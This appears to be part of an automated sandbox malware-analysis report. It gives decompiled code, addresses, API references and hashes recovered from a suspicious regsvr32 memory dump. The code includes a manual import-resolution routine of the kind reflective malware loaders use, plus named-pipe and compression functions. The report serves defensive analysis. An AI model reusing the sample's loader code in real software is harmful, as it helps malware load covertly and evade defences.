                                                                                                                                                                        0x05b938ed
                                                                                                                                                                        0x05b938f1
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b938f1
                                                                                                                                                                        0x05b93815
                                                                                                                                                                        0x05b93818
                                                                                                                                                                        0x05b93860
                                                                                                                                                                        0x05b93861
                                                                                                                                                                        0x05b93864
                                                                                                                                                                        0x05b9386c
                                                                                                                                                                        0x05b93871
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b93871
                                                                                                                                                                        0x05b9381b
                                                                                                                                                                        0x05b9381e
                                                                                                                                                                        0x05b93847
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b93847
                                                                                                                                                                        0x05b93823
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9382e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9382e
                                                                                                                                                                        0x05b937e7
                                                                                                                                                                        0x05b93b1f

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 05B937B2
                                                                                                                                                                          • Part of subcall function 05B9D1A6: FlushFileBuffers.KERNEL32(00000000,?,05B93AC6,00000000,00000004), ref: 05B9D1EC
                                                                                                                                                                        • DisconnectNamedPipe.KERNEL32 ref: 05B93B03
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BuffersDisconnectErrorFileFlushLastNamedPipe
                                                                                                                                                                        • String ID: %u.%u.%u.%u:%u
                                                                                                                                                                        • API String ID: 465096328-3858738763
                                                                                                                                                                        • Opcode ID: 6e4c9009922e42e1d345a4d2a957721dd8806d175f01cff8090ddf618116d57a
                                                                                                                                                                        • Instruction ID: de995dd20a066d64d4c9799428b25532d59e9f4ef09325ad08b2235ab3084c98
                                                                                                                                                                        • Opcode Fuzzy Hash: 6e4c9009922e42e1d345a4d2a957721dd8806d175f01cff8090ddf618116d57a
                                                                                                                                                                        • Instruction Fuzzy Hash: B2A1B272608302AFDB18EF24D889A7BB7E8FB84310F044DBEF55586180DB35F9458B52
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05BA370B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151libraryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                        			E05BA370B(signed int __eax, void* __ecx, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				void* _t163;
				void* _t167;

				_t167 = __ecx;
				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E05B9EFA7(_t167, _v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t34 = _v8 + 0xc; // 0xffff
						_v36 = LoadLibraryA( *_t34 + _a4);
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_t43 = _v8 + 0x10; // 0xb8
								_v12 =  *_t43 + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_t73 = _v8 + 0x10; // 0xb8
									_v24 =  *((intOrPtr*)( *_t73 + _a4 + _v28));
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										_t89 = _v8 + 0x10; // 0xb8
										 *( *_t89 + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}























                                                                                                                                                                        0x05ba370b
                                                                                                                                                                        0x05ba3711
                                                                                                                                                                        0x05ba3719
                                                                                                                                                                        0x05ba372e
                                                                                                                                                                        0x05ba3740
                                                                                                                                                                        0x05ba374c
                                                                                                                                                                        0x05ba3752
                                                                                                                                                                        0x05ba3757
                                                                                                                                                                        0x05ba3763
                                                                                                                                                                        0x05ba38ce
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba38ce
                                                                                                                                                                        0x05ba3769
                                                                                                                                                                        0x05ba3772
                                                                                                                                                                        0x05ba3780
                                                                                                                                                                        0x05ba3783
                                                                                                                                                                        0x05ba3792
                                                                                                                                                                        0x05ba3792
                                                                                                                                                                        0x05ba3799
                                                                                                                                                                        0x05ba37a7
                                                                                                                                                                        0x05ba37aa
                                                                                                                                                                        0x05ba37ba
                                                                                                                                                                        0x05ba37c7
                                                                                                                                                                        0x05ba37ce
                                                                                                                                                                        0x05ba37de
                                                                                                                                                                        0x05ba37f0
                                                                                                                                                                        0x05ba37f6
                                                                                                                                                                        0x05ba37e0
                                                                                                                                                                        0x05ba37e8
                                                                                                                                                                        0x05ba37e8
                                                                                                                                                                        0x05ba37f9
                                                                                                                                                                        0x05ba37fd
                                                                                                                                                                        0x05ba3809
                                                                                                                                                                        0x05ba380d
                                                                                                                                                                        0x05ba3811
                                                                                                                                                                        0x05ba3815
                                                                                                                                                                        0x05ba3821
                                                                                                                                                                        0x05ba384c
                                                                                                                                                                        0x05ba3854
                                                                                                                                                                        0x05ba385a
                                                                                                                                                                        0x05ba3866
                                                                                                                                                                        0x05ba3872
                                                                                                                                                                        0x05ba3823
                                                                                                                                                                        0x05ba3828
                                                                                                                                                                        0x05ba3833
                                                                                                                                                                        0x05ba383f
                                                                                                                                                                        0x05ba383f
                                                                                                                                                                        0x05ba387b
                                                                                                                                                                        0x05ba3881
                                                                                                                                                                        0x05ba388b
                                                                                                                                                                        0x05ba38a7
                                                                                                                                                                        0x05ba388d
                                                                                                                                                                        0x05ba3890
                                                                                                                                                                        0x05ba389c
                                                                                                                                                                        0x05ba389c
                                                                                                                                                                        0x05ba388b
                                                                                                                                                                        0x05ba38af
                                                                                                                                                                        0x05ba38b8
                                                                                                                                                                        0x05ba38b8
                                                                                                                                                                        0x05ba38c6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba38c6
                                                                                                                                                                        0x05ba37d2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba37d2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba37aa
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 05BA3728
                                                                                                                                                                        • LoadLibraryA.KERNEL32(00000000), ref: 05BA37C1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HandleLibraryLoadModule
                                                                                                                                                                        • String ID: GetProcAddress$kernel32.dll
                                                                                                                                                                        • API String ID: 4133054770-1584408056
                                                                                                                                                                        • Opcode ID: 5039119d16aa62c3896b8816938d44baec7993318a6ef76d11edb677eabdc5b3
                                                                                                                                                                        • Instruction ID: 1cf1ead2a40be34a93e7a17c4deb6815587c725dd626c66a4608c6361d620e9c
                                                                                                                                                                        • Opcode Fuzzy Hash: 5039119d16aa62c3896b8816938d44baec7993318a6ef76d11edb677eabdc5b3
                                                                                                                                                                        • Instruction Fuzzy Hash: AB618D76E04209EFDB01CF98C485BADBBF1FF08355F248599E815AB291D774AA80DF50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05BA4100 Relevance: 6.6, APIs: 5, Instructions: 341COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 99%
                                                                                                                                                                        			E05BA4100(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0xfed1e900
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0xbde85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E05BA7120(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E05BA5E80(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0xbde85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E05BA5FC0( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0x8341ffff
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xed7505f9
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0xbde85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0x8341ffff
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E05BA5FC0(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0xfed1e900
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0xbde85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0xbde85000
							E05BA7120(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E05BA5E80( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0xbde85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}






















































                                                                                                                                                                        0x05ba4106
                                                                                                                                                                        0x05ba410b
                                                                                                                                                                        0x05ba410f
                                                                                                                                                                        0x05ba4112
                                                                                                                                                                        0x05ba4112
                                                                                                                                                                        0x05ba4115
                                                                                                                                                                        0x05ba411a
                                                                                                                                                                        0x05ba411f
                                                                                                                                                                        0x05ba4122
                                                                                                                                                                        0x05ba4127
                                                                                                                                                                        0x05ba412a
                                                                                                                                                                        0x05ba4130
                                                                                                                                                                        0x05ba4130
                                                                                                                                                                        0x05ba413b
                                                                                                                                                                        0x05ba413e
                                                                                                                                                                        0x05ba4145
                                                                                                                                                                        0x05ba414a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba4150
                                                                                                                                                                        0x05ba4155
                                                                                                                                                                        0x05ba4155
                                                                                                                                                                        0x05ba415a
                                                                                                                                                                        0x05ba4160
                                                                                                                                                                        0x05ba416a
                                                                                                                                                                        0x05ba416f
                                                                                                                                                                        0x05ba4175
                                                                                                                                                                        0x05ba4194
                                                                                                                                                                        0x05ba4197
                                                                                                                                                                        0x05ba41a2
                                                                                                                                                                        0x05ba41a2
                                                                                                                                                                        0x05ba41a2
                                                                                                                                                                        0x05ba4199
                                                                                                                                                                        0x05ba4199
                                                                                                                                                                        0x05ba419b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba419d
                                                                                                                                                                        0x05ba419d
                                                                                                                                                                        0x05ba419d
                                                                                                                                                                        0x05ba419b
                                                                                                                                                                        0x05ba41aa
                                                                                                                                                                        0x05ba41af
                                                                                                                                                                        0x05ba41b4
                                                                                                                                                                        0x05ba41ba
                                                                                                                                                                        0x05ba41be
                                                                                                                                                                        0x05ba41c1
                                                                                                                                                                        0x05ba41c4
                                                                                                                                                                        0x05ba41ca
                                                                                                                                                                        0x05ba41cf
                                                                                                                                                                        0x05ba41d2
                                                                                                                                                                        0x05ba41d8
                                                                                                                                                                        0x05ba41dd
                                                                                                                                                                        0x05ba41e3
                                                                                                                                                                        0x05ba41e9
                                                                                                                                                                        0x05ba41ee
                                                                                                                                                                        0x05ba41f1
                                                                                                                                                                        0x05ba41f6
                                                                                                                                                                        0x05ba41fa
                                                                                                                                                                        0x05ba41fe
                                                                                                                                                                        0x05ba4201
                                                                                                                                                                        0x05ba4204
                                                                                                                                                                        0x05ba420d
                                                                                                                                                                        0x05ba4214
                                                                                                                                                                        0x05ba4217
                                                                                                                                                                        0x05ba421a
                                                                                                                                                                        0x05ba421f
                                                                                                                                                                        0x05ba4224
                                                                                                                                                                        0x05ba4227
                                                                                                                                                                        0x05ba422a
                                                                                                                                                                        0x05ba422a
                                                                                                                                                                        0x05ba422e
                                                                                                                                                                        0x05ba4237
                                                                                                                                                                        0x05ba423e
                                                                                                                                                                        0x05ba4241
                                                                                                                                                                        0x05ba4246
                                                                                                                                                                        0x05ba424b
                                                                                                                                                                        0x05ba424b
                                                                                                                                                                        0x05ba424e
                                                                                                                                                                        0x05ba4253
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba4177
                                                                                                                                                                        0x05ba4179
                                                                                                                                                                        0x05ba4186
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba4186
                                                                                                                                                                        0x05ba4179
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba4175
                                                                                                                                                                        0x05ba4259
                                                                                                                                                                        0x05ba425e
                                                                                                                                                                        0x05ba4261
                                                                                                                                                                        0x05ba4264
                                                                                                                                                                        0x05ba430f
                                                                                                                                                                        0x05ba430f
                                                                                                                                                                        0x05ba426a
                                                                                                                                                                        0x05ba426a
                                                                                                                                                                        0x05ba426a
                                                                                                                                                                        0x05ba426f
                                                                                                                                                                        0x05ba4299
                                                                                                                                                                        0x05ba429c
                                                                                                                                                                        0x05ba429c
                                                                                                                                                                        0x05ba42a1
                                                                                                                                                                        0x05ba42a3
                                                                                                                                                                        0x05ba42a5
                                                                                                                                                                        0x05ba42a8
                                                                                                                                                                        0x05ba42ab
                                                                                                                                                                        0x05ba42b3
                                                                                                                                                                        0x05ba42b8
                                                                                                                                                                        0x05ba42b8
                                                                                                                                                                        0x05ba42be
                                                                                                                                                                        0x05ba42c1
                                                                                                                                                                        0x05ba42c4
                                                                                                                                                                        0x05ba42c7
                                                                                                                                                                        0x05ba42c9
                                                                                                                                                                        0x05ba42c9
                                                                                                                                                                        0x05ba42ca
                                                                                                                                                                        0x05ba42ca
                                                                                                                                                                        0x05ba42c7
                                                                                                                                                                        0x05ba42d8
                                                                                                                                                                        0x05ba42db
                                                                                                                                                                        0x05ba42df
                                                                                                                                                                        0x05ba42e4
                                                                                                                                                                        0x05ba42e7
                                                                                                                                                                        0x05ba42ea
                                                                                                                                                                        0x05ba42ea
                                                                                                                                                                        0x05ba42ea
                                                                                                                                                                        0x05ba42ed
                                                                                                                                                                        0x05ba42ed
                                                                                                                                                                        0x05ba42f0
                                                                                                                                                                        0x05ba42f0
                                                                                                                                                                        0x05ba4271
                                                                                                                                                                        0x05ba4271
                                                                                                                                                                        0x05ba4281
                                                                                                                                                                        0x05ba4284
                                                                                                                                                                        0x05ba4289
                                                                                                                                                                        0x05ba4289
                                                                                                                                                                        0x05ba428c
                                                                                                                                                                        0x05ba428f
                                                                                                                                                                        0x05ba4292
                                                                                                                                                                        0x05ba4294
                                                                                                                                                                        0x05ba4294
                                                                                                                                                                        0x05ba42f3
                                                                                                                                                                        0x05ba42f5
                                                                                                                                                                        0x05ba42f8
                                                                                                                                                                        0x05ba42f8
                                                                                                                                                                        0x05ba42fe
                                                                                                                                                                        0x05ba4302
                                                                                                                                                                        0x05ba4305
                                                                                                                                                                        0x05ba4307
                                                                                                                                                                        0x05ba4307
                                                                                                                                                                        0x05ba4318
                                                                                                                                                                        0x05ba431a
                                                                                                                                                                        0x05ba431a
                                                                                                                                                                        0x05ba4322
                                                                                                                                                                        0x05ba4330
                                                                                                                                                                        0x05ba4333
                                                                                                                                                                        0x05ba4335
                                                                                                                                                                        0x05ba4355
                                                                                                                                                                        0x05ba4355
                                                                                                                                                                        0x05ba4358
                                                                                                                                                                        0x05ba435e
                                                                                                                                                                        0x05ba435f
                                                                                                                                                                        0x05ba4362
                                                                                                                                                                        0x05ba4364
                                                                                                                                                                        0x05ba4367
                                                                                                                                                                        0x05ba436a
                                                                                                                                                                        0x05ba436d
                                                                                                                                                                        0x05ba4371
                                                                                                                                                                        0x05ba4374
                                                                                                                                                                        0x05ba4377
                                                                                                                                                                        0x05ba437a
                                                                                                                                                                        0x05ba437c
                                                                                                                                                                        0x05ba437c
                                                                                                                                                                        0x05ba437f
                                                                                                                                                                        0x05ba4381
                                                                                                                                                                        0x05ba4381
                                                                                                                                                                        0x05ba4384
                                                                                                                                                                        0x05ba4386
                                                                                                                                                                        0x05ba4389
                                                                                                                                                                        0x05ba4391
                                                                                                                                                                        0x05ba4394
                                                                                                                                                                        0x05ba4399
                                                                                                                                                                        0x05ba4399
                                                                                                                                                                        0x05ba439f
                                                                                                                                                                        0x05ba43a2
                                                                                                                                                                        0x05ba43a5
                                                                                                                                                                        0x05ba43a7
                                                                                                                                                                        0x05ba43a7
                                                                                                                                                                        0x05ba43a8
                                                                                                                                                                        0x05ba43a8
                                                                                                                                                                        0x05ba43b3
                                                                                                                                                                        0x05ba43b3
                                                                                                                                                                        0x05ba43b3
                                                                                                                                                                        0x05ba43b6
                                                                                                                                                                        0x05ba43b9
                                                                                                                                                                        0x05ba43b9
                                                                                                                                                                        0x05ba43bc
                                                                                                                                                                        0x05ba43bc
                                                                                                                                                                        0x05ba437f
                                                                                                                                                                        0x05ba43bf
                                                                                                                                                                        0x05ba43c2
                                                                                                                                                                        0x05ba43c5
                                                                                                                                                                        0x05ba43c7
                                                                                                                                                                        0x05ba43ca
                                                                                                                                                                        0x05ba43cc
                                                                                                                                                                        0x05ba43cf
                                                                                                                                                                        0x05ba43d2
                                                                                                                                                                        0x05ba43d4
                                                                                                                                                                        0x05ba43d7
                                                                                                                                                                        0x05ba43df
                                                                                                                                                                        0x05ba43e7
                                                                                                                                                                        0x05ba43ea
                                                                                                                                                                        0x05ba43ea
                                                                                                                                                                        0x05ba43ea
                                                                                                                                                                        0x05ba43ed
                                                                                                                                                                        0x05ba43ed
                                                                                                                                                                        0x05ba43ed
                                                                                                                                                                        0x05ba43f0
                                                                                                                                                                        0x05ba43f6
                                                                                                                                                                        0x05ba43f8
                                                                                                                                                                        0x05ba43f8
                                                                                                                                                                        0x05ba43fe
